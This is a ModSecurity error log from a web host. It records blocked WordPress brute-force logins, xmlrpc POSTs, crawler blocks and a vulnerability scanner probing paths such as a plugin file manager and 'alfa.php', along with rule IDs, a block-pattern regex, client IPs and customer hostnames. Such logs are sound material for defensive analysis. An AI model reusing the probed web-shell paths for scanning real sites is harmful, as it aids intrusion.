[Tue May 26 18:43:37.973602 2026] [security2:error] [pid 1015481:tid 1015599] [remote 74.91.224.220:42208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWcgbQIKfWDMlp2INdqXQABNnU"]
[Tue May 26 18:43:38.290945 2026] [security2:error] [pid 1015481:tid 1015578] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcgrQIKfWDMlp2INdqbQABSGA"]
[Tue May 26 18:43:38.291166 2026] [security2:error] [pid 1015481:tid 1015673] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcgrQIKfWDMlp2INdqbQABSGA"]
[Tue May 26 18:43:39.890489 2026] [security2:error] [pid 1015481:tid 1015546] [remote 52.66.96.197:44580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.96.66.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWcg7QIKfWDMlp2INdqngABWkA"]
[Tue May 26 18:43:39.945978 2026] [security2:error] [pid 1015481:tid 1015568] [remote 50.6.192.190:34648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcg7QIKfWDMlp2INdqnwABHVY"]
[Tue May 26 18:43:40.463924 2026] [security2:error] [pid 1015481:tid 1015657] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWchLQIKfWDMlp2INdqrAAAATg"]
[Tue May 26 18:43:42.729350 2026] [security2:error] [pid 1015481:tid 1015588] [remote 50.6.192.190:34648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWchrQIKfWDMlp2INdq-wABT2o"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:43:42.977272 2026] [security2:error] [pid 1015481:tid 1015647] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWchrQIKfWDMlp2INdq9AAAAS4"]
[Tue May 26 18:43:43.936178 2026] [http2:info] [pid 1025417:tid 1025417] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 18:43:43.949266 2026] [security2:error] [pid 1025417:tid 1025547] [client 114.119.137.28:45509] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/prespontaneousedcc/defedf1830096.shtml"] [unique_id "ahWch1HbArxonFeMXvQKRQAAAAA"], referer: http://ghanemgh.com/prespontaneousedcc/defedf1830096.shtml
[Tue May 26 18:43:45.104901 2026] [security2:error] [pid 1025417:tid 1025596] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWciFHbArxonFeMXvQKZgAAADE"]
[Tue May 26 18:43:45.469909 2026] [security2:error] [pid 1025417:tid 1025634] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWciVHbArxonFeMXvQKfgAAAFc"]
[Tue May 26 18:43:47.722121 2026] [security2:error] [pid 1025417:tid 1025610] [client 124.43.5.103:37929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWci1HbArxonFeMXvQKxgAAAD8"]
[Tue May 26 18:43:47.722307 2026] [security2:error] [pid 1025417:tid 1025610] [client 124.43.5.103:37929] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWci1HbArxonFeMXvQKxgAAAD8"]
[Tue May 26 18:43:48.131643 2026] [security2:error] [pid 1025417:tid 1025661] [client 20.116.59.164:18770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWcjFHbArxonFeMXvQK0wAAAHI"]
[Tue May 26 18:43:48.131779 2026] [security2:error] [pid 1025417:tid 1025661] [client 20.116.59.164:18770] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWcjFHbArxonFeMXvQK0wAAAHI"]
[Tue May 26 18:43:48.952251 2026] [security2:error] [pid 1025417:tid 1025540] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcjFHbArxonFeMXvQK7gAAIHo"]
[Tue May 26 18:43:48.952479 2026] [security2:error] [pid 1025417:tid 1025579] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcjFHbArxonFeMXvQK7gAAIHo"]
[Tue May 26 18:43:49.734735 2026] [security2:error] [pid 1025417:tid 1025583] [client 103.162.184.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcjVHbArxonFeMXvQK-gAAACQ"]
[Tue May 26 18:43:50.028246 2026] [security2:error] [pid 1025417:tid 1025624] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcjVHbArxonFeMXvQK_QAAAE0"]
[Tue May 26 18:43:50.471827 2026] [security2:error] [pid 1025417:tid 1025636] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcjlHbArxonFeMXvQLDwAAAFk"]
[Tue May 26 18:43:50.496497 2026] [security2:error] [pid 1025417:tid 1025570] [client 20.116.59.164:18771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/admin.php"] [unique_id "ahWcjlHbArxonFeMXvQLGQAAABc"]
[Tue May 26 18:43:50.496615 2026] [security2:error] [pid 1025417:tid 1025570] [client 20.116.59.164:18771] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/admin.php"] [unique_id "ahWcjlHbArxonFeMXvQLGQAAABc"]
[Tue May 26 18:43:52.056728 2026] [security2:error] [pid 1025417:tid 1025432] [remote 52.18.195.140:42764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcj1HbArxonFeMXvQLNwAAIQ4"]
[Tue May 26 18:43:52.096893 2026] [security2:error] [pid 1025417:tid 1025434] [remote 103.230.156.120:55362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcj1HbArxonFeMXvQLOwAADhA"]
[Tue May 26 18:43:52.528616 2026] [security2:error] [pid 1025417:tid 1025437] [remote 52.18.195.140:42764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWckFHbArxonFeMXvQLSQAAThM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:43:52.581035 2026] [security2:error] [pid 1025417:tid 1025435] [remote 109.205.180.55:41074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWckFHbArxonFeMXvQLRQAAORE"]
[Tue May 26 18:43:53.322247 2026] [security2:error] [pid 1025417:tid 1025441] [remote 109.205.180.55:41074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWckVHbArxonFeMXvQLYAAAFhc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:43:53.608562 2026] [security2:error] [pid 1025417:tid 1025611] [client 20.116.59.164:18703] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/goods.php"] [unique_id "ahWckVHbArxonFeMXvQLcQAAAEA"]
[Tue May 26 18:43:53.608680 2026] [security2:error] [pid 1025417:tid 1025611] [client 20.116.59.164:18703] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/goods.php"] [unique_id "ahWckVHbArxonFeMXvQLcQAAAEA"]
[Tue May 26 18:43:53.655221 2026] [security2:error] [pid 1025417:tid 1025668] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWckVHbArxonFeMXvQLXwAAAHk"]
[Tue May 26 18:43:55.970964 2026] [security2:error] [pid 1025417:tid 1025674] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWck1HbArxonFeMXvQLqgAAAH8"]
[Tue May 26 18:43:56.846616 2026] [security2:error] [pid 1025417:tid 1025472] [remote 123.30.233.13:49276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWclFHbArxonFeMXvQL0AAAezY"]
[Tue May 26 18:43:56.901075 2026] [security2:error] [pid 1025417:tid 1025662] [client 20.116.59.164:18785] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/public/css.php"] [unique_id "ahWclFHbArxonFeMXvQL2wAAAHM"]
[Tue May 26 18:43:56.901181 2026] [security2:error] [pid 1025417:tid 1025662] [client 20.116.59.164:18785] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/public/css.php"] [unique_id "ahWclFHbArxonFeMXvQL2wAAAHM"]
[Tue May 26 18:43:58.287283 2026] [security2:error] [pid 1025417:tid 1025549] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWclVHbArxonFeMXvQL_wAAAAI"]
[Tue May 26 18:43:58.399388 2026] [security2:error] [pid 1025417:tid 1025667] [client 124.43.5.103:56576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcllHbArxonFeMXvQMEAAAAHg"]
[Tue May 26 18:43:58.399506 2026] [security2:error] [pid 1025417:tid 1025667] [client 124.43.5.103:56576] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcllHbArxonFeMXvQMEAAAAHg"]
[Tue May 26 18:43:58.534161 2026] [security2:error] [pid 1025417:tid 1025632] [client 20.116.59.164:18796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/alfa.php"] [unique_id "ahWcllHbArxonFeMXvQMGQAAAFU"]
[Tue May 26 18:43:58.534256 2026] [security2:error] [pid 1025417:tid 1025632] [client 20.116.59.164:18796] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/alfa.php"] [unique_id "ahWcllHbArxonFeMXvQMGQAAAFU"]
[Tue May 26 18:44:00.124935 2026] [security2:error] [pid 1025417:tid 1025506] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcl1HbArxonFeMXvQMSAAANlg"]
[Tue May 26 18:44:00.125151 2026] [security2:error] [pid 1025417:tid 1025601] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcl1HbArxonFeMXvQMSAAANlg"]
[Tue May 26 18:44:00.386692 2026] [security2:error] [pid 1025417:tid 1025606] [client 60.49.92.72:48328] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWcmFHbArxonFeMXvQMVQAAO1w"]
[Tue May 26 18:44:00.722802 2026] [security2:error] [pid 1025417:tid 1025552] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcmFHbArxonFeMXvQMWAAAAAU"]
[Tue May 26 18:44:00.938272 2026] [security2:error] [pid 1025417:tid 1025597] [client 20.116.59.164:18767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/css.php"] [unique_id "ahWcmFHbArxonFeMXvQMZAAAADI"]
[Tue May 26 18:44:00.938359 2026] [security2:error] [pid 1025417:tid 1025597] [client 20.116.59.164:18767] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/css.php"] [unique_id "ahWcmFHbArxonFeMXvQMZAAAADI"]
[Tue May 26 18:44:01.258135 2026] [security2:error] [pid 1025417:tid 1025516] [remote 178.156.182.155:49696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcmVHbArxonFeMXvQMbgAAK2I"]
[Tue May 26 18:44:01.627945 2026] [security2:error] [pid 1025417:tid 1025518] [remote 209.42.19.17:52916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcmVHbArxonFeMXvQMeQAALmQ"]
[Tue May 26 18:44:02.060147 2026] [security2:error] [pid 1025417:tid 1025521] [remote 195.250.23.247:39096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcmVHbArxonFeMXvQMjAAAIGc"]
[Tue May 26 18:44:03.180775 2026] [security2:error] [pid 1025417:tid 1025627] [client 20.116.59.164:18692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/classwithtostring.php"] [unique_id "ahWcm1HbArxonFeMXvQMqwAAAFA"]
[Tue May 26 18:44:03.180909 2026] [security2:error] [pid 1025417:tid 1025627] [client 20.116.59.164:18692] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/classwithtostring.php"] [unique_id "ahWcm1HbArxonFeMXvQMqwAAAFA"]
[Tue May 26 18:44:03.249005 2026] [security2:error] [pid 1025417:tid 1025580] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcmlHbArxonFeMXvQMpwAAACE"]
[Tue May 26 18:44:05.291775 2026] [security2:error] [pid 1025417:tid 1025420] [remote 52.66.96.197:39432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.96.66.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWcnVHbArxonFeMXvQM3wAAGwI"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 18:44:06.537673 2026] [security2:error] [pid 1025417:tid 1025640] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcnlHbArxonFeMXvQM9AAAAF0"]
[Tue May 26 18:44:08.647619 2026] [security2:error] [pid 1025417:tid 1025635] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcoFHbArxonFeMXvQNKgAAAFg"]
[Tue May 26 18:44:09.284019 2026] [security2:error] [pid 1025417:tid 1025559] [client 124.43.5.103:38447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcoVHbArxonFeMXvQNOgAAAAw"]
[Tue May 26 18:44:09.284223 2026] [security2:error] [pid 1025417:tid 1025559] [client 124.43.5.103:38447] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcoVHbArxonFeMXvQNOgAAAAw"]
[Tue May 26 18:44:10.670892 2026] [security2:error] [pid 1025417:tid 1025539] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcolHbArxonFeMXvQNVwAAO3k"]
[Tue May 26 18:44:10.671098 2026] [security2:error] [pid 1025417:tid 1025606] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcolHbArxonFeMXvQNVwAAO3k"]
[Tue May 26 18:44:11.385818 2026] [security2:error] [pid 1025417:tid 1025542] [remote 91.227.122.219:37716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWco1HbArxonFeMXvQNagAAWHw"]
[Tue May 26 18:44:11.702412 2026] [security2:error] [pid 1025417:tid 1025592] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWco1HbArxonFeMXvQNbQAAAC0"]
[Tue May 26 18:44:13.103607 2026] [security2:error] [pid 1025417:tid 1025574] [client 185.191.171.8:20878] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/event/list/"] [unique_id "ahWcpVHbArxonFeMXvQNlgAAABs"]
